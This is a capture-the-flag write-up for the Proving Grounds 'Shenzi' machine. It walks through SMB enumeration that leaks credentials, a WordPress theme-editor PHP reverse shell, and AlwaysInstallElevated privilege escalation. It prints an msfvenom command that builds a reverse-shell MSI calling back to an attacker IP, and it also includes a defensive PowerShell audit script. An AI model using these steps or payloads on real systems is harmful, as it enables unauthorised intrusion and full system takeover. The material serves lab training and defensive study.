Shenzi - Proving Grounds Practice
Enumeration
Nmap
An initial nmap scan revealed that the FTP, SMB and HTTP ports were open.
SMB Enumeration
An SMB null session was allowed and I could access the Shenzi share.
It included suspicious files such as passwords.txt.
This file contained administrator passwords for several different applications.
I then applied RID brute forcing and found that the username is shenzi.
Exploitation
Wordpress Theme Editor (404.php)
At first I tried directory brute forcing and many other things, but none of them worked. Later I reasoned that, since the username is shenzi and the share name is shenzi, there might also be an endpoint named shenzi, and indeed there was.
It was a WordPress website and I simply logged in using the credentials found earlier in the passwords.txt file.
I then used ivan-sincek/php-reverse-shell to replace 404.php under the theme editor, changing the IP value to my local IP.
This gave me a user shell.
I then simply read the user flag.
Privilege Escalation
AlwaysInstallElevated
The AlwaysInstallElevated check identifies a Windows Group Policy misconfiguration that allows standard users to install MSI packages with SYSTEM-level privileges. This setting, when enabled in both HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER, allows any user to execute arbitrary code with elevated privileges by creating a malicious MSI installer.
For more information: https://docs.specterops.io/ghostpack-docs/SharpUp-mdx/checks/alwaysinstallelevated
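An audit and remediation script for the misconfiguration described above, added here as an example (it is not from the original write-up or from SharpUp). It assumes the standard policy registry paths for Windows Installer and, when run with -Remediate, explicitly sets both values to 0:

```powershell
# Audit-AlwaysInstallElevated.ps1 (added example, not part of the original write-up)
# Windows Installer only runs MSIs as SYSTEM when the DWORD is 1 under BOTH hives.
param([switch]$Remediate)

$Paths = @{
    HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($hive in $Paths.Keys) {
        # SilentlyContinue: the key or value may not exist, which means "policy not configured"
        $item = Get-ItemProperty -Path $Paths[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { $null }
    }
    return $state
}

function Test-AlwaysInstallElevated {
    $s = Get-AlwaysInstallElevatedState
    foreach ($hive in 'HKLM', 'HKCU') {
        $value = if ($null -eq $s[$hive]) { 'not set' } else { $s[$hive] }
        Write-Host ("{0} AlwaysInstallElevated = {1}" -f $hive, $value)
    }
    # Exploitable only when both the machine and the user policy are enabled
    return ($s['HKLM'] -eq 1 -and $s['HKCU'] -eq 1)
}

function Disable-AlwaysInstallElevated {
    # Remediation: set both values to 0 (writing HKLM requires administrative rights).
    # If the value is pushed by Group Policy, also fix the GPO
    # ("Always install with elevated privileges" under Windows Components > Windows Installer).
    foreach ($hive in $Paths.Keys) {
        if (-not (Test-Path $Paths[$hive])) { New-Item -Path $Paths[$hive] -Force | Out-Null }
        Set-ItemProperty -Path $Paths[$hive] -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

if (Test-AlwaysInstallElevated) {
    Write-Warning 'VULNERABLE: AlwaysInstallElevated is enabled in both hives.'
    if ($Remediate) { Disable-AlwaysInstallElevated; Write-Host 'Both values set to 0.' }
} else {
    Write-Host 'OK: AlwaysInstallElevated is not enabled in both hives.'
}
```

Note that HKCU reflects the policy for the user running the script, so the check should be run in the context of the low-privileged account being assessed.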
At first I executed WinPEAS.exe and PowerUp.ps1 and both showed that AlwaysInstallElevated was enabled.
As seen in the second image, I tried Write-UserAddMsi but it did not work. Later, I created a malicious MSI file with msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=4444 -f msi -o malicious.msi
Then I transferred it to the target machine and executed it there.
This gave me a SYSTEM shell, and I read the administrator flag.